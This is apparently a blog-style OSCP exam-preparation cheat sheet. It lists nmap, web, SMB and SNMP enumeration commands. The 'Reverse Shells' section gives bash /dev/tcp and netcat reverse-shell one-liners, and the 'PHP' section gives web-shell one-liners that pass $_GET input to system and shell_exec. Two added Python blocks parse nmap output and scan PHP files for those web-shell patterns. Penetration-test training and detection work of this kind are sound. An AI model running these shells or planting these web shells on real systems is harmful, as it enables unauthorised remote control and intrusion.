Useful Commands and Tools – OSCP

In a previous article, we shared a wide range of tools for sub-domain enumeration that help pentesters and bug hunters collect subdomains for the domain they are targeting.

Enumeration is the most important thing you can do. At that inevitable stage where you find yourself hitting a wall, 90% of the time it will be because you haven't done enough enumeration.

There are a ton of certifications in the hacking and security domain, but Offensive Security certifications are the ones that will really make you feel you have earned it, rather than having just crossed your fingers and taken an MCQ exam.

Yes, we're talking about OSCP (Offensive Security Certified Professional). The OSCP preparation, lab, and exam are an awesome journey where you will experience lots of excitement, pain, suffering, frustration, confidence, and motivation, and where learning is constant throughout.

Below are a few commands that will be very helpful for OSCP preparation:

Nmap Commands

[#] Quick TCP Scan

Command: nmap -sC -sV -vv -oA quick 192.168.1.10

[#] Quick UDP Scan

Command: nmap -sU -sV -vv -oA quick_udp 192.168.1.10

[#] Full TCP Scan

Command: nmap -sC -sV -p- -vv -oA full 192.168.1.10
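The `-oA` flag in the three scans above writes `.nmap`, `.gnmap` and `.xml` files with the given basename. The grepable `.gnmap` file is the quickest to post-process, and comparing the quick scan with the full `-p-` scan shows which ports the default top-1000 scan missed. The following parser is an added example, not from the original page; the two `.gnmap` samples are constructed to look like what those commands produce, and the function names are my own.

```python
import re

# Constructed sample of the .gnmap file written by `nmap -sC -sV -vv -oA quick 192.168.1.10`
SAMPLE_QUICK_GNMAP = (
    "# Nmap 7.93 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sC -sV -vv -oA quick 192.168.1.10\n"
    "Host: 192.168.1.10 ()\tStatus: Up\n"
    "Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, 139/filtered/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds?///\tIgnored State: closed (996)\n"
    "# Nmap done at Mon Jan  1 10:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds\n"
)

# Constructed sample for the full `-p-` scan: same host, one extra high port found
SAMPLE_FULL_GNMAP = SAMPLE_QUICK_GNMAP.replace(
    "445/open/tcp//microsoft-ds?///",
    "445/open/tcp//microsoft-ds?///, 8080/open/tcp//http-proxy//Apache Tomcat 9.0.1/",
)


def parse_gnmap(text):
    """Return {host: [(port, proto, service, version), ...]} for open ports only.

    Each entry in the Ports field has the form port/state/proto/owner/service/rpcinfo/version/
    and entries are separated by ", ". Nmap replaces "/" inside version strings with "|",
    so splitting on "/" is safe.
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        host = line.split()[1]
        # Fields on a Host line are tab-separated; isolate the Ports field
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            if state != "open":
                continue
            results.setdefault(host, []).append((int(port), proto, service, version.strip()))
    return results


def new_ports(baseline, full):
    """Ports per host that the full scan found but the baseline (quick) scan did not."""
    diff = {}
    for host, entries in full.items():
        seen = {(p, proto) for p, proto, *_ in baseline.get(host, [])}
        extra = sorted(p for p, proto, *_ in entries if (p, proto) not in seen)
        if extra:
            diff[host] = extra
    return diff


if __name__ == "__main__":
    quick = parse_gnmap(SAMPLE_QUICK_GNMAP)
    full = parse_gnmap(SAMPLE_FULL_GNMAP)
    for host, entries in full.items():
        print(host)
        for port, proto, service, version in entries:
            print(f"  {port}/{proto:<4} {service:<14} {version}")
    print("Missed by the quick scan:", new_ports(quick, full))
```

To use it on real output, read `quick.gnmap` and `full.gnmap` from disk and pass their contents to `parse_gnmap`. Only `open` ports are kept; `filtered` entries such as 139 in the sample are dropped, so re-check those by hand if they matter.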

Web Scanning

[#] Nikto

Command: nikto -h 192.168.1.10

[#] Dirsearch

Command: python dirsearch.py -u http://192.168.1.10 -e php,txt,html,log,conf,cfg,ini,pdf -x 301,403,503,302 --random-agent

[#] Directory Buster

Command: dirb http://192.168.1.10/ /usr/share/wordlists/dirb/common.txt

[#] Whatweb

Command: whatweb -v -a 3 192.168.1.10

[#] Gobuster

Command: gobuster -e -u http://192.168.1.10/ -w /usr/share/wordlists/dirb/common.txt

[#] Wfuzz

Command: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.10

[#] WPScan

Command: wpscan -u http://192.168.1.10/

[#] Joomscan

Command: joomscan -u http://192.168.1.10/

Port Checking

[#] Netcat Banner Grabbing

Command: nc -v 192.168.1.10 port

[#] Telnet Banner Grabbing

Command: telnet 192.168.1.10 port

SMB

[#] SMB Vulnerability Scan

Command: nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.1.10

[#] SMB Users & Shares Scan

Command: nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.1.10

[#] Enum4linux

Command: enum4linux -a 192.168.1.10

[#] Null connect

Command: rpcclient -U "" 192.168.1.10

[#] Connect to SMB share

Command: smbclient //MOUNT/share

SNMP

[#] SNMP Enumeration

Command: snmp-check 192.168.1.10 -c public

Python Servers

[#] Simple Web Server

Command: python -m SimpleHTTPServer 80

[#] FTP Server

Command: python -m pyftpdlib -p 21 -w

Reverse Shells

[#] Bash Shell

Command: bash -i >& /dev/tcp/192.168.1.10/4443 0>&1

[#] Netcat linux

Command: nc -e /bin/sh 192.168.1.10 4443

[#] Netcat windows

Command: nc -e cmd.exe 192.168.1.10 4443

PHP

[#] PHP command Injection with system from GET Request

Command: <?php echo system($_GET["cmd"]);?>

[#] PHP Command Injection with Shell Exec from GET Request

Command: <?php echo shell_exec($_GET["cmd"]);?>
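The two one-liners above are the simplest form of a PHP web shell: a request parameter passed straight into a shell sink. The flip side for anyone cleaning up a lab box or a real web root is spotting them. The scanner below is an added example, not code from the original page; it flags lines where `system`, `shell_exec`, `exec`, `passthru`, `popen` or `proc_open` is called directly on a `$_GET`/`$_POST`/`$_REQUEST`/`$_COOKIE` value. The sample PHP sources are constructed and the function names are my own.

```python
import os
import re

# Functions that hand a string to the OS shell
DANGEROUS_SINKS = ("system", "shell_exec", "exec", "passthru", "popen", "proc_open")
# Request superglobals a remote client controls
REQUEST_SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)"

# Matches the direct one-liner form, e.g. system($_GET["cmd"]) or shell_exec($_REQUEST['c'])
WEBSHELL_RE = re.compile(
    r"\b(?P<sink>" + "|".join(DANGEROUS_SINKS) + r")\s*\(\s*" + REQUEST_SOURCES + r"\s*\[",
    re.IGNORECASE,
)

# Constructed samples: the two one-liners from the page, and a benign file that
# also reads $_GET but never reaches a shell sink
SAMPLE_SHELL_SYSTEM = '<?php echo system($_GET["cmd"]);?>'
SAMPLE_SHELL_EXEC = '<?php echo shell_exec($_GET["cmd"]);?>'
SAMPLE_BENIGN = '<?php\n$name = $_GET["name"];\necho htmlspecialchars($name, ENT_QUOTES);\n?>'


def find_webshell_patterns(source, path="<string>"):
    """Return [(path, line_number, sink), ...] for each line matching the pattern."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for m in WEBSHELL_RE.finditer(line):
            hits.append((path, n, m.group("sink").lower()))
    return hits


def scan_webroot(root):
    """Walk a directory tree and run the pattern over every PHP file found."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(find_webshell_patterns(fh.read(), path))
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
    return hits


if __name__ == "__main__":
    for src, label in ((SAMPLE_SHELL_SYSTEM, "system.php"),
                       (SAMPLE_SHELL_EXEC, "exec.php"),
                       (SAMPLE_BENIGN, "benign.php")):
        for path, line_no, sink in find_webshell_patterns(src, label):
            print(f"{path}:{line_no}: request data passed to {sink}()")
```

Run `scan_webroot("/var/www/html")` (path is a placeholder) to check a whole document root. This catches only the direct form shown on the page; a sink fed through an intermediate variable, `base64_decode`, or `eval` will not match, so treat a clean result as one data point, not proof of absence.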

SQL Injection

[#] SQL Injection Exploitation with Sqlmap

Command: sqlmap -u http://10.10.10.10 --dbs

Sarcastic Writer

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.
